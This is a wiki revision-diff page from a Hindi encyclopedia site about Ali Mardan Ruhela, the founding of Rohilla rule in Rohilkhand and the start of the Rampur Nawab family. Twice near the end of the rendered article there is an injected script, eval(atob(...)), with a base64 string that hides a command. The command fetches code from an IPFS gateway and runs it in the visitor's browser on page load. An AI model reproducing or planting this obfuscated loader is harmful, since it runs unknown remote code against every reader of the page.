Difference between revisions of "अली मर्दान रुहेला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*अली मर्दान रुहेला ने अवध के पश्चिमोत्तर भाग, [[हिमा...' के साथ नया पन्ना बनाया)
 
m (Text replace - "{{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "{{लेख प्रगति |आधार= |प्रारम्भि�)
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
*अली मर्दान रुहेला ने [[अवध]] के पश्चिमोत्तर भाग, [[हिमालय]] की तराई के क्षेत्र में स्थित रुहेलखण्ड में रुहेलों की सत्ता स्थापित की।  
 
*अली मर्दान रुहेला ने [[अवध]] के पश्चिमोत्तर भाग, [[हिमालय]] की तराई के क्षेत्र में स्थित रुहेलखण्ड में रुहेलों की सत्ता स्थापित की।  
*1774 ई. में रुहेला युद्ध समाप्त होने पर और उसके नेता हाफ़िज़ रहमत ख़ाँ के मरने पर [[ईस्ट इंडिया कम्पनी]] ने उसके लड़के फ़ैजुल्ला ख़ाँ को रुहेलखण्ड के एक हिस्से का, जिसमें रामपुर भी शामिल था, शासक बना दिया।  
+
*1774 ई. में रुहेला युद्ध समाप्त होने पर और उसके नेता हाफ़िज़ रहमत ख़ाँ के मरने पर [[ईस्ट इंडिया कम्पनी]] ने उसके लड़के [[फ़ैजुल्ला ख़ाँ]] को [[रुहेलखंड]] के एक हिस्से का, जिसमें रामपुर भी शामिल था, शासक बना दिया।  
*इस प्रकार रामपुर के नवाबों के परिवार की शुरूआत हुई।
+
*इस प्रकार रामपुर के नवाबों के परिवार की शुरुआत हुई।
  
  
 
{{प्रचार}}
 
{{प्रचार}}
{{लेख प्रगति
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|आधार=आधार1
+
{{संदर्भ ग्रंथ}}
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{औपनिवेशिक काल}}
 +
[[Category:इतिहास कोश]][[Category:औपनिवेशिक काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:25, 27 July 2012

  • ali mardan ruhela ne avadh ke pashchimottar bhag, himalay ki taraee ke kshetr mean sthit ruhelakhand mean ruheloan ki satta sthapit ki.
  • 1774 ee. mean ruhela yuddh samapt hone par aur usake neta hafiz rahamat khaan ke marane par eest iandiya kampani ne usake l dake faijulla khaan ko ruhelakhand ke ek hisse ka, jisamean ramapur bhi shamil tha, shasak bana diya.
  • is prakar ramapur ke navaboan ke parivar ki shuruat huee.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>